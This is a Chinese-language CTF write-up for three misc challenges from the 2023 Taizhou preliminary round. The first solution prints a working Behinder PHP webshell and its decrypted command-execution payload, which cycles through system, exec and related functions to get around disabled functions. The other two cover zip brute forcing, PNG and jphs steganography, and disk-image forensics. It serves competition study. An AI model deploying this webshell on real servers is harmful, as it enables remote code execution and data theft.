2023年台州市初赛Misc
这是神马
冰蝎流量,找到key
<?php
@error_reporting(0);
session_start();
$key="144a6b2296333602";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
key=144a6b2296333602,对密文进行aes解密
在线aes解密网站:http://tools.bugscaner.com/cryptoaes/
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
在这个密文中得到
@error_reporting(0);
function getSafeStr($str){
$s1 = iconv('utf-8','gbk//IGNORE',$str);
$s0 = iconv('gbk','utf-8//IGNORE',$s1);
if($s0 == $str){
return $s0;
}else{
return iconv('gbk','utf-8//IGNORE',$str);
}
}
function main($cmd,$path)
{
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);
$result = array();
$PadtJn = @ini_get('disable_functions');
if (! empty($PadtJn)) {
$PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
$PadtJn = explode(',', $PadtJn);
$PadtJn = array_map('trim', $PadtJn);
} else {
$PadtJn = array();
}
$c = $cmd;
if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
$c = $c . " 2>&1\n";
}
$JueQDBH = 'is_callable';
$Bvce = 'in_array';
if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
ob_start();
system($c);
$kWJW = ob_get_contents();
ob_end_clean();
} else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
$handle = proc_open($c, array(
array(
'pipe',
'r'
),
array(
'pipe',
'w'
),
array(
'pipe',
'w'
)
), $pipes);
$kWJW = NULL;
while (! feof($pipes[1])) {
$kWJW .= fread($pipes[1], 1024);
}
@proc_close($handle);
} else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
ob_start();
passthru($c);
$kWJW = ob_get_contents();
ob_end_clean();
} else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
$kWJW = shell_exec($c);
} else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
$kWJW = array();
exec($c, $kWJW);
$kWJW = join(chr(10), $kWJW) . chr(10);
} else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
$fp = popen($c, 'r');
$kWJW = NULL;
if (is_resource($fp)) {
while (! feof($fp)) {
$kWJW .= fread($fp, 1024);
}
}
@pclose($fp);
} else {
$kWJW = 0;
$result["status"] = base64_encode("fail");
$result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
$key = $_SESSION['k'];
echo encrypt(json_encode($result), $key);
return;
}
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode(getSafeStr($kWJW));
echo encrypt(json_encode($result), $_SESSION['k']);
}
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$cmd="Y2QgL3Zhci93d3cvaHRtbC91cGxvYWQvLi4vO3RhciAtY3p2ZiAtIGZsYWcgfCBvcGVuc3NsIGRlczMgLXNhbHQgLWsgdGgxc2lzS2V5IC1vdXQgLi9mbGFnLnRhci5neg==";$cmd=base64_decode($cmd);$path="L3Zhci93d3cvaHRtbC91cGxvYWQvLi4v";$path=base64_decode($path);
main($cmd,$path);
对cmd解base64得到解压命令
cd /var/www/html/upload/../;tar -czvf - flag | openssl des3 -salt -k th1sisKey -out ./flag.tar.gz
对flag.tar.gz解压
openssl des3 -d -salt -in ./flag.tar.gz -k th1sisKey -out ./decrypted_flag.tar
得到emoji,aes-emoji解密,key就是th1sisKey
Black Mamba
是png文件,文件尾多余数据提取
观察结构,符合zip头
for i in range(1,200):
if i ^ 0x48 == 0x50:
print(i)
那直接爆破一下,得知结果是异或24
得到zip,备注说是常见密码
爆了很久没出,最后翻文件找到了之前做渗透时收集的密码本
爆破了好几本才得到密码
一开始还没看出来,字符集改为utf-8
那么直接随波逐流梭一下键盘密码
李先生的计算机
ad1是磁盘文件,FTK挂载
挂载成功后发现名为[email protected]_3684的文件夹
里面是sqlite数据,导入查看
得到了金额是600,以及文件内7z文件的密码(文件名为1的文件是7z文件)微信号是dbt_1126_tta
既然是jpg的隐写,那么把常见的都试一遍
最后发现是jphs
得到银行卡号:6222025567723373838
flag格式:DASCTF
那拼接一下 DASCTF{600_6222025567723373838}
标签:PadtJn,exec,kWJW,Misc,初赛,else,2023,Bvce,array From: https://www.cnblogs.com/Mar10/p/17733250.html